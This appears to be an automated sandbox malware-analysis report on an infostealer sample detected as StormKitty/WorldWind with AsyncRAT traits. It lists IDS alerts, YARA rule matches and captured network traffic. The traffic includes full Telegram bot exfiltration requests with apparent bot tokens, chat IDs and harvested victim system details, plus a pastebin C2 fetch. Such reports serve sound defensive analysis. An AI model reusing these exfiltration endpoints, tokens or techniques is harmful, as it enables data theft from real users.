2025-01-10T19:09:08.157541+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	49819	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T19:09:03.360781+0100	1810007	1	Potentially Bad Traffic	192.168.2.7	49788	149.154.167.220	443	TCP
2025-01-10T19:09:04.353260+0100	1810007	1	Potentially Bad Traffic	192.168.2.7	49794	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: AsyncRAT {"Server": "127.0.0.1", "Ports": "6606,7707,8808"}
Source: RegSvcs.exe.7216.7.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7935009733:AAGBu91qWsmUHTs2GabvLt2Z62A3M4QqyqE/sendMessage", "Telegram Stream": [{"ok": true, "result": {"message_id": 1661, "from": {"id": 7935009733, "is_bot": true, "first_name": "jagaban", "username": "ghandisbot"}, "chat": {"id": 6779103906, "first_name": "David Bhatti", "username": "DaveeBhatti", "type": "private"}, "date": 1736532546, "document": {"file_name": "C_UsersuserAppDataLocal50258fbd039b7763b78e3cbf6b4d4ee3fron.zip", "mime_type": "application/zip", "file_id": "BQACAgQAAxkDAAIGfWeBYkIXtBp14waO18wGOfi7B6g2AAIgGgAC2swQUFKMyHFjnDXONgQ", "file_unique_id": "AgADIBoAAtrMEFA", "file_size": 188596}}}]}

Multi AV Scanner detection for submitted file

Source: 6mllsKaB2q.exe

ReversingLabs: Detection: 71%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 6mllsKaB2q.exe

Joe Sandbox ML: detected

Source: 6mllsKaB2q.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.7:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.7:49813 version: TLS 1.2

Source:	Binary string: winload_prod.pdb source: Temp.txt.7.dr
Source:	Binary string: ntkrnlmp.pdb source: Temp.txt.7.dr
Source:	Binary string: winload_prod.pdb\ source: Temp.txt.7.dr
Source:	Binary string: ntkrnlmp.pdb\ source: Temp.txt.7.dr
Source:	Binary string: wntdll.pdbUGP source: 6mllsKaB2q.exe, 00000001.00000003.1304187373.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, 6mllsKaB2q.exe, 00000001.00000003.1303557736.0000000003540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 6mllsKaB2q.exe, 00000001.00000003.1304187373.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, 6mllsKaB2q.exe, 00000001.00000003.1303557736.0000000003540000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00C1DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	1_2_00C1DBBE
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00BEC2A2 FindFirstFileExW,	1_2_00BEC2A2
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00C268EE FindFirstFileW,FindClose,	1_2_00C268EE
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00C2698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	1_2_00C2698F
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00C1D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_00C1D076
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00C1D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_00C1D3A9
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00C29642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_00C29642
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00C2979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_00C2979D
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00C29B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	1_2_00C29B2B
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00C25C97 FindFirstFileW,FindNextFileW,FindClose,	1_2_00C25C97

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49788 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2031009 - Severity 1 - ET MALWARE StormKitty Data Exfil via Telegram : 192.168.2.7:49788 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2044766 - Severity 1 - ET MALWARE WorldWind Stealer Checkin via Telegram (GET) : 192.168.2.7:49788 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49794 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49802 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49819 -> 149.154.167.220:443

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: pastebin.com

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.790000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: global traffic	HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7935009733:AAGBu91qWsmUHTs2GabvLt2Z62A3M4QqyqE/sendMessage?chat_id=6779103906&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202025-01-10%201:08:51%20pm%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20928100%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20KSDR3NP%0ARAM:%204095MB%0AHWID:%205C79F150C2%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.189%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2060%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2040%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7935009733:AAGBu91qWsmUHTs2GabvLt2Z62A3M4QqyqE/sendMessage?chat_id=6779103906&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: POST /bot7935009733:AAGBu91qWsmUHTs2GabvLt2Z62A3M4QqyqE/sendDocument?chat_id=6779103906 HTTP/1.1Content-Type: multipart/form-data; boundary="ef32c740-a05f-4c9a-991e-25cea7544c67"Host: api.telegram.orgContent-Length: 188961Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET /raw/7B75u64B HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956 HTTP/1.1Content-Type: multipart/form-data; boundary="fbae4b5c-7010-426f-9cdf-9140c1697daa"Host: api.telegram.orgContent-Length: 188961Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox View	IP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox View	IP Address: 104.16.185.241 104.16.185.241

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: icanhazip.com

Source: Network traffic

Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49794 -> 149.154.167.220:443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

Code function: 1_2_00C2CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

1_2_00C2CE44

Source: global traffic	HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7935009733:AAGBu91qWsmUHTs2GabvLt2Z62A3M4QqyqE/sendMessage?chat_id=6779103906&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202025-01-10%201:08:51%20pm%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20928100%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20KSDR3NP%0ARAM:%204095MB%0AHWID:%205C79F150C2%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.189%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2060%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2040%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7935009733:AAGBu91qWsmUHTs2GabvLt2Z62A3M4QqyqE/sendMessage?chat_id=6779103906&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET /raw/7B75u64B HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: 100.41.14.0.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: icanhazip.com
Source: global traffic	DNS traffic detected: DNS query: api.mylnikov.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: pastebin.com

Source: unknown

HTTP traffic detected: POST /bot7935009733:AAGBu91qWsmUHTs2GabvLt2Z62A3M4QqyqE/sendDocument?chat_id=6779103906 HTTP/1.1Content-Type: multipart/form-data; boundary="ef32c740-a05f-4c9a-991e-25cea7544c67"Host: api.telegram.orgContent-Length: 188961Expect: 100-continue

Source: RegSvcs.exe, 00000007.00000002.2521728981.0000000002A32000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2521728981.0000000002996000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: RegSvcs.exe, 00000007.00000002.2521728981.0000000002A32000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2521728981.0000000002996000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.orgd
Source: RegSvcs.exe, 00000007.00000002.2521728981.0000000002A00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pastebin.com
Source: RegSvcs.exe, 00000007.00000002.2521728981.0000000002A00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pastebin.comd
Source: RegSvcs.exe, 00000007.00000002.2521728981.00000000025A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: tmpB4FC.tmp.dat.7.dr, tmpB49A.tmp.dat.7.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegSvcs.exe, 00000007.00000002.2521728981.000000000263C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org
Source: RegSvcs.exe, 00000007.00000002.2521728981.000000000263C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15
Source: RegSvcs.exe, 00000007.00000002.2521728981.0000000002669000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: RegSvcs.exe, 00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000007.00000002.2521728981.0000000002A32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283
Source: RegSvcs.exe, 00000007.00000002.2521728981.0000000002996000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7935009733:AAGBu91qWsmUHTs2GabvLt2Z62A3M4QqyqE/sendDocument?chat_id=6779
Source: RegSvcs.exe, 00000007.00000002.2521728981.00000000026C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7935009733:AAGBu91qWsmUHTs2GabvLt2Z62A3M4QqyqE/sendMessage?chat_id=67791
Source: 6mllsKaB2q.exe, 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/file/bot
Source: RegSvcs.exe, 00000007.00000002.2521728981.0000000002996000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.orgD
Source: tmpB4FC.tmp.dat.7.dr, tmpB49A.tmp.dat.7.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmpB4FC.tmp.dat.7.dr, tmpB49A.tmp.dat.7.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tmpB4FC.tmp.dat.7.dr, tmpB49A.tmp.dat.7.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: tmpB4FC.tmp.dat.7.dr, tmpB49A.tmp.dat.7.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tmpB4FC.tmp.dat.7.dr, tmpB49A.tmp.dat.7.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmpB4FC.tmp.dat.7.dr, tmpB49A.tmp.dat.7.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegSvcs.exe, 00000007.00000002.2521728981.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/LimerBoy/StormKitty
Source: RegSvcs.exe, 00000007.00000002.2521728981.00000000025A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/LimerBoy/StormKitty0&
Source: RegSvcs.exe, 00000007.00000002.2521728981.0000000002A00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com
Source: 6mllsKaB2q.exe, 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2521728981.0000000002996000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/7B75u64B
Source: RegSvcs.exe, 00000007.00000002.2521728981.0000000002A00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/7B75u64Bd
Source: 6mllsKaB2q.exe, 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13
Source: tmpB64A.tmp.dat.7.dr	String found in binary or memory: https://support.mozilla.org
Source: tmpB64A.tmp.dat.7.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: tmpB64A.tmp.dat.7.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
Source: tmpB4FC.tmp.dat.7.dr, tmpB49A.tmp.dat.7.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: tmpB4FC.tmp.dat.7.dr, tmpB49A.tmp.dat.7.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: tmpB64A.tmp.dat.7.dr	String found in binary or memory: https://www.mozilla.org
Source: tmpB64A.tmp.dat.7.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: tmpB64A.tmp.dat.7.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: places.raw.7.dr, tmpB64A.tmp.dat.7.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: tmpB64A.tmp.dat.7.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: places.raw.7.dr, tmpB64A.tmp.dat.7.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813

Source: unknown	HTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.7:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.7:49813 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.6mllsKaB2q.exe.dc0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.790000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6mllsKaB2q.exe PID: 7068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7216, type: MEMORYSTR

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

Code function: 1_2_00C2EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

1_2_00C2EAFF

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

Code function: 1_2_00C2ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

1_2_00C2ED6A

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

1_2_00C2EAFF

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

Code function: 1_2_00C1AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

1_2_00C1AA57

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

Code function: 1_2_00C49576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

1_2_00C49576

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File deleted: C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LFOPODGVOH\QFAPOWPAFG.pdf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File deleted: C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\HMPPSXQPQV.png	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File deleted: C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\GLTYDMDUST\LFOPODGVOH.pdf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File deleted: C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UNKRLCVOHV.xlsx	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File deleted: C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UNKRLCVOHV\SNIPGPPREP.png	Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 1.2.6mllsKaB2q.exe.dc0000.1.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 1.2.6mllsKaB2q.exe.dc0000.1.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 1.2.6mllsKaB2q.exe.dc0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 1.2.6mllsKaB2q.exe.dc0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 1.2.6mllsKaB2q.exe.dc0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 1.2.6mllsKaB2q.exe.dc0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 1.2.6mllsKaB2q.exe.dc0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 7.2.RegSvcs.exe.790000.0.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 7.2.RegSvcs.exe.790000.0.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
